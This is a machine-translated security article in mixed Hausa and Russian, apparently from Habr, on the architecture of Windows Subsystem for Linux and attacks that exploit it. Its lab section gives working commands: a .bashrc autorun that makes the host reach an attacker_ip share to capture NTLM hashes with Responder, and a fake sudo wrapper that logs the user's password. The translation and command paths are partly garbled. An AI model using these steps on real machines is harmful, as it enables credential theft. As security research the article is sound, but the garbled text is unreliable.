Hello, habr! OTUS ta ƙaddamar da sabon rafi a cikin Oktoba . A cikin tsammanin fara karatun, muna raba muku labarin da daya daga cikin malaman mu, Alexander Kolesnikov ya rubuta.
A cikin 2016, Microsoft ya gabatar da sabuwar fasahar WSL ga al'ummar IT (WIndows Subsystem don Linux), wanda a nan gaba ya ba da damar haɗa kan ƙwararrun ƙwararrun ƙwararrun ƙwararrun ƙwararrun ƙwararrun ƙwararrun ƙwararrun ƙwararrun masu amfani da OS na yau da kullun da na ci gaba: Windows da Linux. Wannan fasaha ta ba da damar yin amfani da kayan aikin Linux OS a cikin yanayin Windows ba tare da buƙatar gudanar da Linux ba, misali, ta amfani da Multi-boot. A Habr zaku iya samun labarai masu yawa da ke bayyana fa'idodin amfani da WSL. Duk da haka, da rashin alheri, a lokacin ƙirƙirar wannan labarin, ba a sami wani bincike game da tsaro na irin wannan tsarin aiki na tsarin aiki a kan wannan hanya ba. Wannan sakon zai zama ƙoƙari na gyara wannan. Labarin zai yi magana game da fasalulluka na gine-ginen WSL 1 da 2 kuma suyi nazarin misalai da yawa na hare-hare akan tsarin ta amfani da waɗannan fasahohin. An raba labarin zuwa sassa 2. Na farko zai samar da manyan hanyoyin kai hari daga Linux da Windows. Labari na biyu zai ƙunshi kafa yanayin gwaji da sake haifar da hare-haren.
WSL 1: fasali na gine-gine
Don mafi daidaitaccen nutsewa cikin lamuran tsaro na WSL, ya zama dole a tantance manyan abubuwan da ke da alaƙa da aiwatar da tsarin ƙasa. Ɗaya daga cikin manyan ayyukan mai amfani da WSL ya warware shine ikon yin aiki ta hanyar tashar Linux akan mai watsa shiri da ke aiki da Windows OS. Hakanan, daidaiton da aka bayar ya kasance na asali don Linux executables (ELFs) ana iya aiki da su kai tsaye akan tsarin Windows. Don cimma waɗannan buƙatun, an ƙirƙiri wani tsari na musamman a cikin Windows 10 wanda ke ba ku damar gudanar da aikace-aikacen Linux ta amfani da takamaiman tsarin kiran tsarin - don haka, an yi ƙoƙarin yin taswirar saitin syscalls na Linux akan Windows. An aiwatar da wannan ta jiki ta ƙara sabbin direbobi da sabon tsarin tsari. A gani na gine-gine yayi kama da haka:
A gaskiya ma, an tsara hulɗa tare da tsarin aiki na Linux ta hanyar nau'ikan kernel da yawa da nau'in tsari na musamman - pico. Daga zanen da ke sama, zaku iya ganin cewa tsarin da ke gudana akan misalin Linux akan mai watsa shiri dole ne ya zama ɗan ƙasa kuma dole ne yayi amfani da albarkatun iri ɗaya kamar aikace-aikacen Windows na yau da kullun. Amma ta yaya za a cimma wannan? A cikin aikin An ɓullo da ƙa'idodin tsari don Windows waɗanda ke ba da duk mahimman abubuwan da ake buƙata na tsarin aiki (dangane da sigar sa) don gudanar da aikace-aikacen wani OS.
Yi la'akari da cewa ƙaddamarwar da aka tsara ya sa ya yiwu kada a mai da hankali kan tsarin aiki (musamman, Windows), wanda ake sa ran ƙaddamar da tsarin wani OS, kuma ya ba da shawarar tsarin gaba ɗaya.
Don haka, duk wani aikace-aikacen da ke cikin tsarin pico na iya gudana ba tare da la'akari da kernel na Windows ba:
- Matsalolin dacewa da fassarar kiran tsarin dole ne a warware su ta hanyar masu ba da sabis na musamman;
- Dole ne a gudanar da sarrafa shiga ta hanyar Tsaron Tsaro. Mai saka idanu yana cikin kernel don haka Windows yana buƙatar haɓakawa ta hanyar sabon direba wanda zai iya aiki azaman mai ba da irin waɗannan hanyoyin. An gabatar da tsarin samfurin pico da tsari a ƙasa:
Tun da tsarin fayil ɗin Linux yana amfani da fayil mai hankali da sunayen adireshi, nau'ikan tsarin fayil guda 2 an ƙara su zuwa Windows don aiki tare da WSL - VolFS da DriveFS. VolFS aiwatarwa ne na tsarin fayil ɗin Linux, DriveFS tsarin fayil ne wanda ke aiki bisa ga ka'idodin Windows, amma yana da ikon zaɓar yanayin hankali.
WSL 2
WSL 1 yana da iyakancewa da yawa waɗanda ba su ba da damar yin amfani da shi don magance matsakaicin iyakar ayyuka: alal misali, ba shi da ikon gudanar da aikace-aikacen Linux 32-bit, kuma ba shi yiwuwa a yi amfani da direbobin na'urar. Sabili da haka, a cikin 2020, an saki WSL 2, wanda ya canza tsarin gina tsarin tsarin. WSL 2 ingantacciyar na'ura ce ta kama-da-wane wacce ta dace da halayen amfani da albarkatu na WSL 1. Yanzu, dangane da matsalolin da mai amfani da Windows OS ya warware, zaku iya zaɓar sigar da ake buƙata na tsarin tsarin Linux. Don rage yiwuwar raunin da ya faru, WSL 2 an aiwatar da shi bisa ga Hyper-V a cikin Windows 10. A cikin wannan nau'i, Windows yana da ikon tafiyar da kernel na Linux a ware. Yana da kyau a tuna cewa an gabatar da sigar 1 na WSL azaman fasalin beta wanda yakamata ya nuna alkiblar ci gaban Windows a wannan yanki, don haka canzawa zuwa Hyper-V ya kasance babu makawa. Tsarin gine-gine na ƙarshe yayi kama da haka:
A cikin wannan sigar, kernels na Windows da Linux suna da nasu albarkatun kuma mahaɗin yana wanzu ne kawai a cikin tsarin fayil, amma wannan hanyar ba ta cika ba. Ana yin mu'amala tsakanin tsarin fayil ta hanyar kundiren uwar garken abokin ciniki wanda ke aiki ta amfani da ka'idar 9P.
A yau Microsoft yana ba da ikon canzawa tsakanin WSL 1 da WSL 2. Dukansu nau'ikan suna nan don amfani.
WSL Tsaro
A halin yanzu, akwai ayyuka da yawa waɗanda ke bayyana wasu hanyoyin yin amfani da halaltattun kayan aikin OS don kai hari kan sadarwa tsakanin tsarin ƙasa. Za mu yi amfani da rubutunsu don bincika dacewar harin a lokacin rubutawa. Gabaɗaya jerin hare-hare da yanayin yanayi:
1. Aiwatar da tsarin fayil: haƙƙin samun dama, samuwar kundayen adireshi / hanyoyin musayar bayanai.
An gudanar da bincike don sanin keta dokokin shiga daga Linux FS-> Windows FS, Windows FS-> Linux FS. Bincike ya nuna ikon canza fayil ɗin da aka bayar a cikin OS da aka yi niyya. An kuma yi ƙoƙarin musanya, ƙirƙira kwafi da share sashin tsarin fayil.
Yanayi:
- A. Attack daga tsarin aiki na Windows - gyare-gyaren fayiloli daga directory / sauransu na Linux OS.
- B. Harin daga tsarin aiki na Linux - gyare-gyaren fayiloli a cikin kundayen adireshi:
C:Windows,C:Program Files,C:Users<User>
2. Aiwatar da tarawar hanyar sadarwa.
An gudanar da binciken ne ta hanyar amfani da misalan hare-hare daga tsarin aiki na Linux akan Windows. An yi amfani da fasalulluka na tarin cibiyar sadarwa, wato, hanyoyin tabbatarwa akan albarkatu daban-daban.
Yanayi:
- Bude damar shiga tashar jiragen ruwa da ke kan tsarin Windows
- Bude tashar jiragen ruwa ba tare da haƙƙin da suka dace ba
- Gudun juyawa harsashi ta amfani da fayil ɗin elf akan tsarin aiki na Windows.
3. Boye ƙaddamar da ayyukan software masu cutarwa ta amfani da tsarin WSL.
Binciken ya dogara ne akan gaskiya mai sauƙi - ƙananan tsarin tsaro ba zai iya dakatar da abubuwan da suka faru a cikin wani kernel wanda ke aiki ta amfani da mai ba da izini daga tsarin aiki a cikin yanayin WSL 1. A cikin yanayin WSL 2, babu wata hanya don duba abubuwan da suka faru. a cikin wani kwaya daban a cikin injin kama-da-wane mara nauyi.
Yanayi:
1) Kaddamar da aikace-aikacen don samun damar nesa zuwa tsarin kuma duba abubuwan da aka shiga.
Gwajin WSL 1: shiga tsakani (Windows)
Daga karshe mun kai ga bangaren aiki. Da farko, kuna buƙatar saita yanayin gwaji. Za a gudanar da duk gwaje-gwaje akan benci tare da shigar da Windows 10 2004. An zaɓi hoton Ubuntu 18.04 azaman hoton tsarin aiki don WSL. An zaɓi hoton a bazuwar, kuma kowane zai yi aiki iri ɗaya. Umarni don saita tsayawa:
Dole ne ku fara ƙaddamarwa powershell.exe a matsayin mai gudanarwa.
Don WSL 1 kuna buƙatar gudanar da umarni:
- Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
- Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804
-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft
Ubuntu.appx install —root #Установим образ
Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.
Restart-Computer #Перезагрузим
Bayan sake kunna tsayawar, zaku iya kiran umarnin bash. Idan komai yayi aiki daidai, zaku ga fitarwa mai kama da wannan a cikin na'ura mai kwakwalwa ta Windows:
Za mu yi amfani da rarraba Kali Linux a matsayin injin maharin; duk injuna dole ne su kasance a kan hanyar sadarwar gida ɗaya.
Bari mu ɗauka cewa ba mu da gata zuwa WSL akan injin Windows. Bari mu yi ƙoƙarin kai hari kan tsarin aiki na Linux ta hanyar kiran umarni daga Linux. Don aiwatar da harin, za mu yi amfani da dabarar autorun mai sauƙi - za mu ƙara rubutun mu don aiwatarwa a cikin yanayin Linux. Don yin wannan kuna buƙatar canza fayil ɗin .bashrc.
A kan na'ura tare da WSL muna aiwatar da:
1. bash
2. Переходим в домашнюю директорию пользователя: cd /home/sam/
2. echo «/home/sam/.attack.sh» >> .bashrc
3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
4. chmod u+x .attack.sh
5. exitA kan injin Kali Linux muna aiki:
1. Responder -I eth0 -rdvwA kan injin Windows, bari mu ƙaddamar da bash.
Muna jiran sakamakon akan na'urar Kali Linux:
Don haka, mun sami hashes mai amfani da Windows ta hanyar tsarin WSL ta hanyar aiwatar da umarni akan tsarin Linux.
Gwajin WSL 1: samun kalmar sirrin mai amfani (Linux OS)
Bari mu sake yin gwaji ɗaya. Yayin wannan rajistan za mu ƙara zuwa fayil ɗin .bashrc umarni da yawa don samun kalmar sirrin mai amfani da tsarin aiki na Linux.
Bari mu ƙaddamar da bash kuma shigar da umarni:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit
Don samun nasarar kammala harin, mai amfani Sam yana buƙatar kiran sudo a cikin tashar Linux. Bayan wannan, kalmar sirrin mai amfani da Linux OS zata kasance a cikin fayil ɗin pass.txt:
An ba da aiwatar da hare-haren ne don bayanan ka'idoji kawai.
Sashe na gaba na labarin zai bayyana aiwatar da ka'idar 9P, la'akari da ƙirƙirar na'urar daukar hoto don wannan yarjejeniya, da kuma kai hari ta amfani da shi.
Jerin littattafan da aka yi amfani da su
Kara karantawa
source: www.habr.com